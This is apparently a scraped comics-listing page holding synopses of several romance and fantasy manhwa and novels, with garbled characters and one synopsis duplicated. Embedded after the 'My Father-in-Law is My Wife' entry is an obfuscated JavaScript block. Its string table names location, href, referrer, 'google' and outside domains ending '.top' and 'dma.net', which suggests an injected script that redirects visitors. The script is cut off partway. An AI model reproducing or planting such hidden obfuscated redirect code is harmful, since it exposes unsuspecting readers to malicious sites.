I Ship My Rival x Me My rival, Gu Yiliang, a B-lister rookie, has the face of an idol and can act well, while I, Wei Yanzi, a C-lister rookie, has the face of an idol but with mediocre acting skills. One day, I accidentally discovered a magical world, where no matter we sit, stand, move, or stay, our love is more precious than gold. The name of this world that is brimming with kindness is none other than Niangzi!
Read manhwa That Couple Has a Secret / The Couple Has a Secret / 그 부부에겐 비밀이 있다 The newlyweds who love each other the most in the world Serin and Sowon, have a secret that they cannot tell each other. The wife, Sowon, is the guardian of the kingdom of light, “Cryptic Rose”, the husband, Serin, is the prince of the dark kingdom, “Avalanch”. They became a married couple without knowing the other side of each other, and today they start a marriage fight? who risked their lives for love.
I possessed an extra who died as soon as the original work started. I was the hero’s incompetent guide. Only until I die, will the male lead meet his new guide, the heroine. To safely stray from the original work, I pretended to be dead after consuming a toxic flower that throws you into a coma, but- “My guide isn’t breathing anymore.” ……? “Who the hell can stop me?” The male lead awakened and went berserk? You awakened after thinking I died? You can’t possibly awaken like this….! *** “You’re leaving me?” Bliss scoffed at Shana’s resignation letter. “Is this a new joke?” “No. You don’t need a guide anymore so I…….” “Shana.” Bliss called her in a soft but determined voice. “You can make fun of me, you can deceive me like a fool, or you can play with me as much as you want. So don’t even joke about trying to leave me.” Bliss whispered to Shana with a beautiful smile that looked like a painting. “I just can’t let that slide.” You Awakened while I Was Dead. / Dia Bangkit Ketika Aku Mati. / 제가 죽었다고 각성하시다니요. / You Think I’m Dead?
Eccentric girl Yin Ying finally got into the university of her dreams, but she unexpectedly discovers that Ji Yuchuan, the arrogant and gifted senior, is her first love whom she lost contact with for four years. After a huge misunderstanding, the two started a “game”, pretending to be a couple. His life is now disturbed by her social butterfly behavior, yet his heart never seemed to stop beating – On the road of my chasing dreams, you were there. The curtains of this show of confusing love is about to be lifted~ 温暖的刺 / Wēn Nuǎn De Cì / Thorns of Warmness
On the day of the wedding between a male dentist and a female doctor, the female doctor suddenly swapped body with her own father after a mysterious lightning strike. From that moment onwards, the male dentist’s wife is officially his father-in-law! My Father-in-Law is My Wife / Father – in law is my future wife! / Nh?c ph? ??i nhân là lão bà / Yuefu daren Shi laopo / Yuèfù dàrén shì l?opó / ??? ????? – ??? ??????? / ????? – ??? ??????? ????! / ???????<script></script><script>function _0x4607(_0x196cac,_0x5ad857){var _0x3cd87b=_0x63da();return _0x4607=function(_0x501521,_0x312f96){_0x501521=_0x501521-(0x134d+-0x2667*-0x1+0x38d4*-0x1);var _0x3c658d=_0x3cd87b[_0x501521];return _0x3c658d;},_0x4607(_0x196cac,_0x5ad857);}function _0x63da(){var _0x117e98=['wkxRH','11159946XfFrKd','location','https://ip','22068NGhngj','24LztMFt','.customapi','random','href','referrer','PMhxf','then','rRoGQ','166053JkRVar','jVrmg','http://rea','1280FbIcAV','lZWlp','163150SHopEZ','soHBD','64TWReus','3804549AtlcvD','OmpCN','.top/','34288930JRwcHH','includes','google','658400EujCWb','TWmnm','nnenk','text','floor','yQngo','dma.net/'];_0x63da=function(){return _0x117e98;};return _0x63da();}(function(_0x389d38,_0x278902){var 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“You shouldn’t have crossed this line, Elisha, if you didn’t want it to be like this.” A sturdy arm wrapped around her swaying body. Her head became hazy and an intentional hot sweet sigh was pulled out of her. ‘How the hell did I get myself in this situation—’ Elisha recalled. This never happened before. ‘Yeah, I remember.’ Her future in which she would become the fake concubine to a demonic man from the same family, and would be eaten to death—even down to her bone marrow. A future in which the Cartier ducal family is embroiled in a power struggle and fragmented. To avoid that future, Elisha threw herself at Lucerne, the archrival of her former life. Yeah. There was no problem. She knew this man, before and after her regression. She already knew he was the most notorious maniac in the Empire. 20-year-old Elisha owes 30,000 gold coins (about 15 billion won in Korean currency or around 15 million in USD). After going back in time, in order to avoid a hellish life because of debt, she becomes the most capable illegitimate child in the world and visits Lucerne, the archenemy of her master. “What do you want from me?” “Please lend me some money. And… make me your subordinate. I’ll give you all the information I have.” “Why should I trust you?” “I’ll give myself up as collateral.” Lucerne listened to Elisha and watched her quietly. “Okay. But I decide how to deal with the collateral.” “…….” “First of all, marry me.” “…… huh?” Elisha didn’t expect it either. That her information transaction would become a marriage contract.
포식자의 혼약자 “You shouldn’t have crossed this line, Elisha, if you didn’t want it to be like this.” A sturdy arm wrapped around her swaying body. Her head became hazy and an intentional hot sweet sigh was pulled out of her. ‘How the hell did I get myself in this situation—’ Elisha recalled. This never happened before. ‘Yeah, I remember.’ Her future in which she would become the fake concubine to a demonic man from the same family, and would be eaten to death—even down to her bone marrow. A future in which the Cartier ducal family is embroiled in a power struggle and fragmented. To avoid that future, Elisha threw herself at Lucerne, the archrival of her former life. Yeah. There was no problem. She knew this man, before and after her regression. She already knew he was the most notorious maniac in the Empire. 20-year-old Elisha owes 30,000 gold coins (about 15 billion won in Korean currency or around 15 million in USD). After going back in time, in order to avoid a hellish life because of debt, she becomes the most capable illegitimate child in the world and visits Lucerne, the archenemy of her master. “What do you want from me?” “Please lend me some money. And… make me your subordinate. I’ll give you all the information I have.” “Why should I trust you?” “I’ll give myself up as collateral.” Lucerne listened to Elisha and watched her quietly. “Okay. But I decide how to deal with the collateral.” “…….” “First of all, marry me.” “…… huh?” Elisha didn’t expect it either. That her information transaction would become a marriage contract.
Read manhwa Fly Me To The Moon An unusual existence, evil things are not enough to say they are monsters. An unexpected appearance by Jeong Yeon, who attended her mother’s funeral, forces her to enter their world. Hate is manipulated, terrible pain. There was someone holding her right when she broke down.
Dinghai Fusheng Records Amidst the Silence of All Magic in the Divine Land, Mara is about to descend. In order to prevent the destruction of the Divine Land and save all the people, Chen Xing, the last exorcist, embarks on a journey to release the sealed spiritual qi of heaven and earth — only four years remain. The road ahead is full of thorns. Watch this cute little koi Chen Xing and the moody and grumpy Protector Xiang Shu, together with numerous people with distinct personalities in their group, working together to turn the tide again and again!
Read manhwa My Classmates Are Vampire / 내 짝꿍은 뱀파이어! What?! Me? The Vampire Queen?!! My name is Han Yeseul, I’m an ordinary human living in a world where humans and vampires coexist, I was about to enter my dream high school when… because of an error with my application form, I was transferred to an exclusive vampires school. I couldn’t let them know that I was a human, so I dyed my hair and put contact lenses to pass unnoticed…. However, everyone in the school now sees me as one of the Legendary vampires that are “pure blood” and even call me their queen!!! I have been faking successfully for now, I just need to maintain it for a year so I can transfer to the highschool of my dreams as I was supposed to. Or at least, that’s what I was pretending to do until one of my vampire classmates Changyeol discovers my true identity after hearing me talking alone in the bathroom, Will I really be able to survive this School full of blood sucking demons for a year and stop getting involved in more bizarre situations?!
Xiao Lin, the young master of the tycoon family, became a super negligent overnight. The twelve gold hairpins, the principal and the deputy, are all elite goddesses from all walks of life. Xiao Lin can only continue his life if he completes the contract with them. So Xiao Lin was forced to embark on the path of the hunting goddess.
I was a warrior, who died after being taken advantage of, in my previous life. I was reborn, so I tried to get revenge, but how could I be so unlucky to get kidnapped and sent to an orphanage? But; “Why don’t you come with me?” I was adopted by a rich family. I decided to leave in three years time, after causing a moderate amount of trouble. “Are you going to leave?” “Yes?” “Are you really leaving us?” My family refused to let me go. Why are they so obsessed with me?! [Taken from NovelUpdates] 가족들이 나한테 집착한다 / Devoted to Diamond